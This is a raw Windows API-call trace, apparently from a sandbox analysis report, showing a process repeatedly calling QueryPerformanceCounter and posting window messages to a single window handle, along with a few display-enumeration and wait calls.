[0161.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097999168028) returned 1 [0161.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097999181965) returned 1 [0161.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098000768018) returned 1 [0161.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098000781335) returned 1 [0161.206] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098002539429) returned 1 [0161.207] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098002559001) returned 1 [0161.222] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098004118466) returned 1 [0161.222] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098004133070) returned 1 [0161.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098005717027) returned 1 [0161.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098005732531) returned 1 [0161.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098007294091) returned 1 [0161.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098007310867) returned 1 [0161.271] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098009010714) returned 1 [0161.271] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098009030531) returned 1 [0161.286] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098010462176) returned 1 [0161.286] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098010475374) returned 1 [0161.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098012073712) returned 1 [0161.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098012098895) returned 1 [0161.318] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098013663895) returned 1 [0161.318] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098013679841) returned 1 [0161.334] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098015282385) returned 1 [0161.334] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098015303276) returned 1 [0161.360] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098017917651) returned 1 [0161.360] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098017935607) returned 1 [0161.365] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098018449584) returned 1 [0161.366] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098018471799) returned 1 [0161.381] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098020039837) returned 1 [0161.382] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098020054209) returned 1 [0161.397] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098021647091) returned 1 [0161.398] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098021667707) returned 1 [0161.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098023233130) returned 1 [0161.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098023245667) returned 1 [0161.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098024840159) returned 1 [0161.430] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098024856797) returned 1 [0161.445] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098026441836) returned 1 [0161.446] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098026458459) returned 1 [0161.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098028041187) returned 1 [0161.462] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098028058954) returned 1 [0161.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098029639838) returned 1 [0161.478] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098029658347) returned 1 [0161.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098031241818) returned 1 [0161.494] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098031255927) returned 1 [0161.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098032841704) returned 1 [0161.510] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098032856258) returned 1 [0161.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098034401395) returned 1 [0161.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098034422068) returned 1 [0161.542] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098036143776) returned 1 [0161.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098036158625) returned 1 [0161.558] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098037735483) returned 1 [0161.558] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098037752048) returned 1 [0161.575] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098039437658) returned 1 [0161.575] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098039451848) returned 1 [0161.590] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098040939821) returned 1 [0161.591] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098040985785) returned 1 [0161.606] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098042526669) returned 1 [0161.606] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098042553613) returned 1 [0161.622] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098044120494) returned 1 [0161.622] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098044137751) returned 1 [0161.638] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098045726119) returned 1 [0161.638] WTSGetActiveConsoleSessionId () returned 0x1 [0161.639] CreateDXGIFactory () returned 0x0 [0161.640] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0x6adfd54 | out: lpDevMode=0x6adfd54) returned 1 [0161.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098045953569) returned 1 [0161.654] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098047289762) returned 1 [0161.654] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098047306770) returned 1 [0161.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098048892151) returned 1 [0161.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098048905292) returned 1 [0161.688] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098050704415) returned 1 [0161.688] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.688] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x369505a4, lParam=0x3d09) returned 1 [0161.688] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098050737270) returned 1 [0161.703] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098052244882) returned 1 [0161.704] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.704] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x369541d0, lParam=0x3d09) returned 1 [0161.704] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098052288651) returned 1 [0161.719] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098053846504) returned 1 [0161.720] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.720] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36958061, lParam=0x3d09) returned 1 [0161.720] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098053887185) returned 1 [0161.735] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098055440862) returned 1 [0161.735] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.736] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3695bea8, lParam=0x3d09) returned 1 [0161.736] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098055482318) returned 1 [0161.751] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098057046788) returned 1 [0161.752] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.752] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3695fd63, lParam=0x3d09) returned 1 [0161.752] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098057080778) returned 1 [0161.767] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098058646775) returned 1 [0161.768] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.768] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36963be3, lParam=0x3d09) returned 1 [0161.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098058681061) returned 1 [0161.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098060263169) returned 1 [0161.784] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.784] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36967b07, lParam=0x3d09) returned 1 [0161.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098060331136) returned 1 [0161.799] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098061844914) returned 1 [0161.800] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.800] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3696b8d1, lParam=0x3d09) returned 1 [0161.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098061886245) returned 1 [0161.815] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098063441634) returned 1 [0161.815] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.816] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3696f730, lParam=0x3d09) returned 1 [0161.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098063475188) returned 1 [0161.831] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098065046211) returned 1 [0161.832] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.832] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x369735de, lParam=0x3d09) returned 1 [0161.832] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098065103250) returned 1 [0161.847] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098066641011) returned 1 [0161.847] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0161.848] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3697742a, lParam=0x3d09) returned 1 [0161.848] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098066679541) returned 1 [0161.863] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098068242398) returned 1 [0161.864] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098068258772) returned 1 [0161.880] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098069878097) returned 1 [0161.880] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098069894716) returned 1 [0161.895] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098071454445) returned 1 [0161.896] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098071480424) returned 1 [0161.911] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098073052537) returned 1 [0161.912] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098073077504) returned 1 [0162.014] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098083271540) returned 1 [0162.014] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098083290484) returned 1 [0162.014] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098083340224) returned 1 [0162.015] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098083356668) returned 1 [0162.023] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098084242782) returned 1 [0162.024] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098084259154) returned 1 [0162.039] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098085851229) returned 1 [0162.040] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098085874401) returned 1 [0162.055] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098087445208) returned 1 [0162.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098087462019) returned 1 [0162.071] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098089050790) returned 1 [0162.072] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098089083628) returned 1 [0162.089] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098090816659) returned 1 [0162.089] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098090838155) returned 1 [0162.103] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098092247841) returned 1 [0162.104] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098092275809) returned 1 [0162.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098093922801) returned 1 [0162.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098093940458) returned 1 [0162.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098095496239) returned 1 [0162.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098095513859) returned 1 [0162.152] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098097094019) returned 1 [0162.152] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098097133386) returned 1 [0162.168] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098098695849) returned 1 [0162.168] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098098712320) returned 1 [0162.184] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098100290609) returned 1 [0162.184] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098100306686) returned 1 [0162.201] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098102048227) returned 1 [0162.202] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098102073475) returned 1 [0162.217] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098103597625) returned 1 [0162.217] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098103620177) returned 1 [0162.233] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098105198338) returned 1 [0162.233] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098105216450) returned 1 [0162.249] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098106804376) returned 1 [0162.249] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098106841057) returned 1 [0162.265] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098108393422) returned 1 [0162.265] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098108409326) returned 1 [0162.281] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098110010738) returned 1 [0162.281] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098110033852) returned 1 [0162.297] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098111594215) returned 1 [0162.297] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098111611677) returned 1 [0162.313] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098113203783) returned 1 [0162.313] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098113239858) returned 1 [0162.329] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098114841178) returned 1 [0162.330] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098114856020) returned 1 [0162.345] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098116394514) returned 1 [0162.345] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098116408393) returned 1 [0162.366] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098118514357) returned 1 [0162.366] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098118535968) returned 1 [0162.379] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098119839404) returned 1 [0162.379] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098119852471) returned 1 [0162.396] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098121530869) returned 1 [0162.396] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098121548129) returned 1 [0162.412] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098123092927) returned 1 [0162.412] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098123111390) returned 1 [0162.428] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098124694549) returned 1 [0162.428] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098124708995) returned 1 [0162.444] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098126289463) returned 1 [0162.444] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098126303047) returned 1 [0162.460] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098127887616) returned 1 [0162.460] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098127899911) returned 1 [0162.476] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098129488050) returned 1 [0162.476] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098129501156) returned 1 [0162.492] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098131090019) returned 1 [0162.492] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0162.492] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0162.492] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0162.493] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0163.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098262139336) returned 1 [0163.806] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098262489156) returned 1 [0163.806] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0163.806] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b5567b, lParam=0x3d09) returned 1 [0163.806] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098262531271) returned 1 [0163.822] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098264089130) returned 1 [0163.822] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0163.822] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b594fb, lParam=0x3d09) returned 1 [0163.822] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098264129655) returned 1 [0163.838] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098265689247) returned 1 [0163.838] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0163.838] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b5d37c, lParam=0x3d09) returned 1 [0163.838] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098265728857) returned 1 [0163.854] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098267287546) returned 1 [0163.854] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0163.854] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b611eb, lParam=0x3d09) returned 1 [0163.854] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098267326862) returned 1 [0163.870] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098268897803) returned 1 [0163.870] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0163.870] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b650d2, lParam=0x3d09) returned 1 [0163.870] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098268937442) returned 1 [0163.886] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098270487524) returned 1 [0163.886] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0163.886] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b68eeb, lParam=0x3d09) returned 1 [0163.886] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098270547154) returned 1 [0163.902] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098272086334) returned 1 [0163.902] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 